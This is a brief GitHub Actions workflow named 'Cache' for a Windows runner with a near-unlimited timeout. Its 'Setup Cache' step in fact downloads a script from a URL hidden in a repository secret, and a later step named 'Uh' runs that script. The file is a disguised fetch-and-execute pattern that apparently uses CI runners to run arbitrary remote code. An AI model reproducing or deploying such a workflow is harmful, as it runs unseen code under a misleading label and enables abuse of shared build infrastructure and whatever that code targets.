name: Cache

on: push

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 99999999
    
    steps:
    - name: Setup Cache
      run: Invoke-WebRequest "$Env:FL" -OutFile C:\ss.cmd
      env:
        FL: ${{ secrets.FL }}

    - name: Checks
      run: cmd.exe /c "cd C:\ & dir"

    - name: Uh
      run: cmd.exe /c "C:\ss.cmd"
